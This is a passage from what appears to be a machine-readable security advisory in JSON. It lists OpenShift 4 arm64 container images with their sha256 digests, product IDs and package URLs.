"purl": "pkg:oci/openshift/ose-azure-cloud-controller-manager-rhel9@sha256%3Af3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844665"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-node-manager-rhel9@sha256%3A63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cluster-api-controllers-rhel9@sha256%3Ac47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9@sha256%3Aa0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9-operator@sha256%3Acb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844592"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847491"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-workload-identity-webhook-rhel9@sha256%3A98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773855356"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3Afe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3Aedbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848551"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3Aeaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845520"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3Aa7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773612481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Afc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848529"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Ae207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845449"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Afef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3A51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847476"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3A66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844474"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849293"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3Ac82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3Aac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844497"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3Ab0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844499"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3Aae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846804"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844782"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
